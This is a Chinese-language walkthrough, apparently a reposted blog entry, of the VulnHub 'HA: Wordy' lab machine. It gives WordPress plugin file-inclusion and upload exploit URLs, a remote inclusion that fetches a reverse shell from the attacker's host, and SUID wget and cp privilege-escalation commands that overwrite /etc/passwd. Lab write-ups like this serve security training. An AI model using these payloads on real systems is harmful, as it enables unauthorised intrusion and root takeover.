下载地址:https://download.vulnhub.com/ha/ha-wordy.ova
攻击者IP:192.168.56.132 桥接(自动) vmare
受害者IP:192.168.56.153 仅主机 vxbox
参考:https://cloud.tencent.com/developer/article/2457831
端口扫描
主页是apache默认页面
目录扫描
info.php显示了自己的地址
经典wp目录
wpscan --url http://192.168.56.153/wordpress/ -e u
发现用户
admin
aarti
密码爆破失败
看一下插件漏洞
wpscan --url http://192.168.56.153/wordpress/ -e u,ap
可能存在漏洞的插件
mail-masta
reflex-gallery
site-editor
slideshow-gallery
wp-easycart-data
wp-support-plus-responsive-ticket-system
wp-symposium
wp插件漏洞1
mail masta版本1.0
脚本会检查目标是否可用,并判断 Mail Masta 端点是否存在漏洞。如果一切正常,脚本将会开始 fuzzing 以查找系统中的文件。
并不能反弹shell
根据代码内容发现存在本地文件包含
验证漏洞
http://192.168.56.153/wordpress//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
存在远程文件包含
包含一下shell文件
直接访问apache的php文件不会解析
用python开启一下临时的http服务
python -m http.server 8080
然后访问
http://192.168.56.153/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.56.132:8080/shell5.0.php
反弹shell
wp插件漏洞2
searchsploit reflex
3.13的任意文件上传
cat /usr/share/exploitdb/exploits/php/webapps/36374.txt
查看poc
开启apache服务后将文件放在/var/www/html中,修改ip为受害者ip
上传shell5.0.php
浏览器访问,反弹shell
http://192.168.56.153/wordpress/wp-content/uploads/2024/10/shell5.0.php
http://192.168.56.153/secret.zip
在/var/www/html发现一个上锁的zip
爆破失败
home存在用户raj
查看config文件发现密码123
切换raj用户,发现切换失败
使用suid提权
find / -user root -perm -4000 -print 2>/dev/null
发现wget和cp
SUID提权
wget提权
TF=$(mktemp)chmod +x $TFecho -e '#!/bin/sh -pn/bin/sh -p 1>&0' >$TF/usr/bin/wget --use-askpass=$TF 0
cp提权
cd /var/www/htmlcat /etc/passwd > passwdopenssl passwd -1 -salt admin admin$1$admin$1kgWpnZpUx.vTroWPXPIB0
wget 192.168.56.132/passwd
cp /tmp/passwd /etc/passwd
admin/admin
原文始发于微信公众号(王之暴龙战神):ha-wordy
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论